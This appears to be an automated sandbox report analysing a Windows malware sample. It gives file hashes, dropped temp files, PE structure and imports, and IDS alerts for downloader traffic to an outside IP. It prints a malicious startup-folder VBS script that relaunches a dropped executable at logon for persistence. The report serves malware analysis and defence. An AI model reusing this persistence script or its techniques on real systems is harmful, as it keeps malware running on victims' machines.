Entropy (8bit):	7.814513140229084
Encrypted:	false
SSDEEP:	3072:Cv3ixT5meCS3u+QR9HKnVP1fFJoqMqv2LkhCl3d7m3zquzKnRn2Zk2rhel457e1y:CvUTuku+a9LqPe8zVzORn2qaE+VeUpgC
MD5:	8DBA016778F2388FC60B69CA4F4F1462
SHA1:	EEEC84D1EA1A328B0F6C7A96DF1A46E453B9B632
SHA-256:	F54C26C6B3F8FC169008A9CD5986DC56B24E7ED75B223FC4DB1F79E22513696C
SHA-512:	01D2F2E06A3DEE6FF1A368533433CE05735898C0FF41C6E45BBBC6D36C472F17A26AD3509AC75E9B5081136894DE24AB10B8E910928973EB7E9325B7EC3B91FE
Malicious:	false
Reputation:	low
Preview:	...4@Q794VJR..FL.CQ790VJ.CAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ79.VJRM^.B4.X...W..b..%Gc!EVW$+?c"'"Z,%.[Uv8'-a/"...d.]9.7mLKF.CQ790VJ:S.k`E./.H.(f#.?toK=nF.N]..=j7.Jo .Gl'.,qb(2(2.I..?4.2.8~.8/.H.(.; )j=.=Q790VJRCAFL4CQ79..CAFLd.Q7u1RJ&.A.L4CQ790V.R`@MM=CQ.80V.SCAFL4l.790FJRC.GL4C.79 VJRAAFI4CQ790VORCAFL4CQ.:0VNRC.}N4AQ7.0VZRCQFL4CA79 VJRCAF\4CQ790VJRCA.Y6C.790V*PC.VM4CQ790VJRCAFL4CQ790VJRCAF..BQ+90VJRCAFL4CQ790VJRCAFL4CQ79.[HR.AFL4CQ790VJR.@F.5CQ790VJRCAFL4CQ790VJRCAFL4m%RADVJR[.GL4SQ79.WJRGAFL4CQ790VJRCAfL4#.E]Q"+RC.+L4C.6908JRC.GL4CQ790VJRCAF.4C..]Q"+RCA.\|4CQ.;0V\RCALN4CQ790VJRCAFLtCQ..B%81CAF.$BQ7Y2VJ@BAFl6CQ790VJRCAFL4.Q7y0VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJRCAFL4CQ790VJR

C:\Users\user\AppData\Local\Temp\aut16C0.tmp

Download File

Process:	C:\Users\user\Desktop\CvzLvta2bG.exe
File Type:	data
Category:	dropped
Size (bytes):	200496
Entropy (8bit):	7.982055361308061
Encrypted:	false
SSDEEP:	6144:ggZtWzBnMHBigeU2B6uP6H01BRS7RoRfm:TZtEhMHBig2BB6U1iL
MD5:	870FD5A9C5C6917DA8ED69E84AEA3670
SHA1:	7156A68E609BAD5E7DAF7CCB44D4A408E38FB2C8
SHA-256:	3687665990E34FFFFC8C04739A5A8238C58D1ADEDFF992646F27F763D46D199E
SHA-512:	0BC4B846E6C556E0AC1219B50C05F46A7E869E5DF84927CCC79115AB0D6FD3EB59B735FE36668FDF701E31DED33F567154A3250FEAA066852C2B18A701036ECE
Malicious:	false
Reputation:	low
Preview:	EA06..2..G;.J.Fo9.U.U-...L.P..I.Z....h...nj@..O@.4...)....b.l..+....r.-Z.$...r)<..,...u[..O-...QH<z....e.{m2.F..'fuS....]L.7H.J,.=L..o..m.n.:....mS}5. .Q.}...b.L..-.&....>.-\....K.@..bw ..........t......Q..f5T..A..a.UR.P).......L....l....`...G.'"3y..8..h..L......L...u}.M(5...aV.T.u.....i..r..W.fmC.......KV...}..-..+.l....EJ..5......}..-J.D..+}`....4j.......S&.;...Q.J.T?...h..3......'\|....2.O.....4E.s..p.4.S..~...........i..P.3z..J.P.4kd..s...f......7..C...[].iD..<5..G%)..u.5.o9.O)p-.R.......5..c......K&.h]K...Q.;.t.s=.R..8.....k......l.C.1.h ..E....k....W.w.Ph..m.3:...;X.3.w..u/.s.V.t.Thu.i..r/3...L...+0....cT...g..4..g...a.{9...N.^+t.n.}...h.....d(...........IC.^..?$..G.1X6.q..RW...g..b.(.....u...*....T.....C.M.}.>....X..3..{......P.N.7..... p..}..n:..UK...Z$.)D....md..R.y..M..P..&t..B.n.V.V..b..(....a..T..4.!P......sa....q..L8v(5....9S..Z...jT=.]..[..xO..J.L.a...Q,.h>$..An....{7...[...C.....jo...a=......\f.n}l.A..

C:\Users\user\AppData\Local\Temp\aut1A3B.tmp

Download File

Process:	C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe
File Type:	data
Category:	dropped
Size (bytes):	200496
Entropy (8bit):	7.982055361308061
Encrypted:	false
SSDEEP:	6144:ggZtWzBnMHBigeU2B6uP6H01BRS7RoRfm:TZtEhMHBig2BB6U1iL
MD5:	870FD5A9C5C6917DA8ED69E84AEA3670
SHA1:	7156A68E609BAD5E7DAF7CCB44D4A408E38FB2C8
SHA-256:	3687665990E34FFFFC8C04739A5A8238C58D1ADEDFF992646F27F763D46D199E
SHA-512:	0BC4B846E6C556E0AC1219B50C05F46A7E869E5DF84927CCC79115AB0D6FD3EB59B735FE36668FDF701E31DED33F567154A3250FEAA066852C2B18A701036ECE
Malicious:	false
Reputation:	low
Preview:	EA06..2..G;.J.Fo9.U.U-...L.P..I.Z....h...nj@..O@.4...)....b.l..+....r.-Z.$...r)<..,...u[..O-...QH<z....e.{m2.F..'fuS....]L.7H.J,.=L..o..m.n.:....mS}5. .Q.}...b.L..-.&....>.-\....K.@..bw ..........t......Q..f5T..A..a.UR.P).......L....l....`...G.'"3y..8..h..L......L...u}.M(5...aV.T.u.....i..r..W.fmC.......KV...}..-..+.l....EJ..5......}..-J.D..+}`....4j.......S&.;...Q.J.T?...h..3......'\|....2.O.....4E.s..p.4.S..~...........i..P.3z..J.P.4kd..s...f......7..C...[].iD..<5..G%)..u.5.o9.O)p-.R.......5..c......K&.h]K...Q.;.t.s=.R..8.....k......l.C.1.h ..E....k....W.w.Ph..m.3:...;X.3.w..u/.s.V.t.Thu.i..r/3...L...+0....cT...g..4..g...a.{9...N.^+t.n.}...h.....d(...........IC.^..?$..G.1X6.q..RW...g..b.(.....u...*....T.....C.M.}.>....X..3..{......P.N.7..... p..}..n:..UK...Z$.)D....md..R.y..M..P..&t..B.n.V.V..b..(....a..T..4.!P......sa....q..L8v(5....9S..Z...jT=.]..[..xO..J.L.a...Q,.h>$..An....{7...[...C.....jo...a=......\f.n}l.A..

C:\Users\user\AppData\Local\Temp\aut486F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe
File Type:	data
Category:	dropped
Size (bytes):	200496
Entropy (8bit):	7.982055361308061
Encrypted:	false
SSDEEP:	6144:ggZtWzBnMHBigeU2B6uP6H01BRS7RoRfm:TZtEhMHBig2BB6U1iL
MD5:	870FD5A9C5C6917DA8ED69E84AEA3670
SHA1:	7156A68E609BAD5E7DAF7CCB44D4A408E38FB2C8
SHA-256:	3687665990E34FFFFC8C04739A5A8238C58D1ADEDFF992646F27F763D46D199E
SHA-512:	0BC4B846E6C556E0AC1219B50C05F46A7E869E5DF84927CCC79115AB0D6FD3EB59B735FE36668FDF701E31DED33F567154A3250FEAA066852C2B18A701036ECE
Malicious:	false
Reputation:	low
Preview:	EA06..2..G;.J.Fo9.U.U-...L.P..I.Z....h...nj@..O@.4...)....b.l..+....r.-Z.$...r)<..,...u[..O-...QH<z....e.{m2.F..'fuS....]L.7H.J,.=L..o..m.n.:....mS}5. .Q.}...b.L..-.&....>.-\....K.@..bw ..........t......Q..f5T..A..a.UR.P).......L....l....`...G.'"3y..8..h..L......L...u}.M(5...aV.T.u.....i..r..W.fmC.......KV...}..-..+.l....EJ..5......}..-J.D..+}`....4j.......S&.;...Q.J.T?...h..3......'\|....2.O.....4E.s..p.4.S..~...........i..P.3z..J.P.4kd..s...f......7..C...[].iD..<5..G%)..u.5.o9.O)p-.R.......5..c......K&.h]K...Q.;.t.s=.R..8.....k......l.C.1.h ..E....k....W.w.Ph..m.3:...;X.3.w..u/.s.V.t.Thu.i..r/3...L...+0....cT...g..4..g...a.{9...N.^+t.n.}...h.....d(...........IC.^..?$..G.1X6.q..RW...g..b.(.....u...*....T.....C.M.}.>....X..3..{......P.N.7..... p..}..n:..UK...Z$.)D....md..R.y..M..P..&t..B.n.V.V..b..(....a..T..4.!P......sa....q..L8v(5....9S..Z...jT=.]..[..xO..J.L.a...Q,.h>$..An....{7...[...C.....jo...a=......\f.n}l.A..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs

Download File

Process:	C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.4349007143040726
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcloFQlr1UEZ+lX1Bar6lElAl4IUPMlm6nriIM8lfQVn:DsO+vNlfx1Q1Bm6x4jkm4mA2n
MD5:	FF782446AF1887091D3A31B511BB95FB
SHA1:	4EEC525CAA4E073B67D1CFFF0673858F6BD6CF54
SHA-256:	2450FC7232807E33209D463A7A53D4CC91A32FD7A8FEAF5CC4BD80A0DA02E972
SHA-512:	C9A5741FF4ECC9AAB27CC60AB12715705366EDC5FB78F1003FFF5025BAF58D245DD780EC77219BFCE728E1179E412ACD24FEA23169DD9AB0EEBEB999FE88EDDC
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.H.y.m.e.n.o.p.h.y.l.l.a.c.e.a.e.\.d.e.f.i.n.i.t.i.v.e.n.e.s.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.083833005366142
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CvzLvta2bG.exe
File size:	1'117'184 bytes
MD5:	61a2f4563666bdbf6d6ce0ec58f57c64
SHA1:	b2cbeba9b074991e13df15c90a4dfc445b4875a4
SHA256:	9880b5e431d9441856a10a0031353a164aa3d792474912f9c96796092978ad40
SHA512:	31e351e9b3034d0600930c034aba5f016b35525ba3059e25e315b63cae51eab70d2d96f7f97e4f00235c0bbb48275418eba2e9cd296e56a32073d4e3407dc207
SSDEEP:	24576:vu6J33O0c+JY5UZ+XC0kGso6FaMOIEEOVoMZWY:Zu0c++OCvkGs9FaM/5OVkY
TLSH:	E035BF2273DDC360CB669173BF2977016EBF7C614A30B85B2F980D7DA950162262D763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675F8364 [Mon Dec 16 01:33:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FEF28EB800Ah
jmp 00007FEF28EAADD4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FEF28EAAF5Ah
cmp edi, eax
jc 00007FEF28EAB2BEh
bt dword ptr [004C31FCh], 01h
jnc 00007FEF28EAAF59h
rep movsb
jmp 00007FEF28EAB26Ch
cmp ecx, 00000080h
jc 00007FEF28EAB124h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FEF28EAAF60h
bt dword ptr [004BE324h], 01h
jc 00007FEF28EAB430h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FEF28EAB0FDh
test edi, 00000003h
jne 00007FEF28EAB10Eh
test esi, 00000003h
jne 00007FEF28EAB0EDh
bt edi, 02h
jnc 00007FEF28EAAF5Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FEF28EAAF63h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FEF28EAAFB5h
bt esi, 03h
jnc 00007FEF28EAB008h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x48220	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x110000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x48220	0x48400	e1801f84f3071a1f430c6662943c42cc	False	0.9080510650951558	data	7.8503701110556605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x110000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x3f4e5	data			1.0003316608883113
RT_GROUP_ICON	0x10eca0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x10ed18	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x10ed2c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x10ed40	0x14	data	English	Great Britain	1.25
RT_VERSION	0x10ed54	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x10ee30	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T20:04:02.931895+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49710	132.226.8.169	80	TCP
2025-01-10T20:04:13.635166+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49713	132.226.8.169	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
